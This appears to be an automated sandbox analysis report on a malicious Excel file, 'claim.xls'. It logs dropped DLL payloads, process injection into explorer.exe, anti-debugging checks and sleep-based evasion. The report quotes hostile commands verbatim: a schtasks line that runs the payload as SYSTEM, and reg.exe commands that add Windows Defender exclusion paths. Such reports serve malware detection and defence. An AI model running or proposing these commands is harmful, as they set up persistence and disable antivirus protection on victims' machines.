Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.2404627315[1].dat
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.2404627315[3].dat
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Fiosa2.der
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Fiosa.der
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.2404627315[2].dat
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Fiosa1.der
Drops PE files to the user directory
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Fiosa2.der
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Fiosa.der
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Fiosa1.der

Boot Survival:

Drops PE files to the user root directory
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Fiosa2.der
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Fiosa.der
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Fiosa1.der
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn hmgscuofc /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 05:48 /ET 06:00

Hooking and other Techniques for Hiding and Protection:

Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 3044 base: 4F102D value: E9 BA 4C BE FF
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2308 base: 4F102D value: E9 BA 4C B9 FF
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 984 base: 4F102D value: E9 BA 4C C2 FF
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2964 base: 4F102D value: E9 BA 4C B9 FF
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: claim.xls Stream path 'Workbook' entropy: 7.94597570807 (max. 8.0)

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 840 Thread sleep count: 49 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 308 Thread sleep time: -148000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1960 Thread sleep count: 47 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2788 Thread sleep count: 50 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 772 Thread sleep count: 61 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1232 Thread sleep count: 50 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 2524 Thread sleep count: 62 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 2524 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 2568 Thread sleep count: 39 > 30
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.2404627315[1].dat
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.2404627315[3].dat
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.2404627315[2].dat
Source: C:\Windows\SysWOW64\regsvr32.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetWindowsDirectoryW, 5_2_1000D01F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_1000AEB4 FindFirstFileW,FindNextFileW, 5_2_1000AEB4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 6_2_000DAEB4 FindFirstFileW,FindNextFileW, 6_2_000DAEB4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 13_2_0008AEB4 FindFirstFileW,FindNextFileW, 13_2_0008AEB4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0011AEB4 FindFirstFileW,FindNextFileW, 16_2_0011AEB4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 23_2_0008AEB4 FindFirstFileW,FindNextFileW, 23_2_0008AEB4

Anti Debugging:

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_10005F82 EntryPoint,OutputDebugStringA,GetModuleHandleA,GetModuleFileNameW,GetLastError,memset,MultiByteToWideChar,GetFileAttributesW,CreateThread,SetLastError, 5_2_10005F82
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_10012AEC GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress, 5_2_10012AEC
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_10029660 GetProcessHeap,RtlAllocateHeap, 5_2_10029660
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_1007792E mov eax, dword ptr fs:[00000030h] 5_2_1007792E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_1007785D mov eax, dword ptr fs:[00000030h] 5_2_1007785D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_10077464 push dword ptr fs:[00000030h] 5_2_10077464
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_1007792E mov eax, dword ptr fs:[00000030h] 9_2_1007792E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_1007785D mov eax, dword ptr fs:[00000030h] 9_2_1007785D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_10077464 push dword ptr fs:[00000030h] 9_2_10077464
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_1007792E mov eax, dword ptr fs:[00000030h] 12_2_1007792E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_1007785D mov eax, dword ptr fs:[00000030h] 12_2_1007785D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_10077464 push dword ptr fs:[00000030h] 12_2_10077464
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 15_2_1007792E mov eax, dword ptr fs:[00000030h] 15_2_1007792E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 15_2_1007785D mov eax, dword ptr fs:[00000030h] 15_2_1007785D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 15_2_10077464 push dword ptr fs:[00000030h] 15_2_10077464
Source: C:\Windows\SysWOW64\explorer.exe Code function: 6_2_000D5A61 RtlAddVectoredExceptionHandler, 6_2_000D5A61
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_00115A61 RtlAddVectoredExceptionHandler, 16_2_00115A61

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 80000
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 4F102D
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: B0000
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: C0000
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 80000 protect: page read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: C0000 protect: page read and write
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 3044 base: 80000 value: 9C
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 3044 base: 4F102D value: E9
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2308 base: B0000 value: 9C
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2308 base: 4F102D value: E9
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 984 base: C0000 value: 9C
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 984 base: 4F102D value: E9
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2964 base: B0000 value: 9C
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2964 base: 4F102D value: E9
Yara detected hidden Macro 4.0 in Excel
Source: Yara match File source: claim.xls, type: SAMPLE
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa.der
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn hmgscuofc /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 05:48 /ET 06:00
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa1.der
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa2.der
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Wsctwy' /d '0'
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Orvzzr' /d '0'
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
Source: explorer.exe, 00000006.00000002.848099829.0000000000B20000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000002.848099829.0000000000B20000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: explorer.exe, 00000006.00000002.848099829.0000000000B20000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Code function: 6_2_000D31C2 CreateNamedPipeA, 6_2_000D31C2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_1000980C GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 5_2_1000980C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetWindowsDirectoryW, 5_2_1000D01F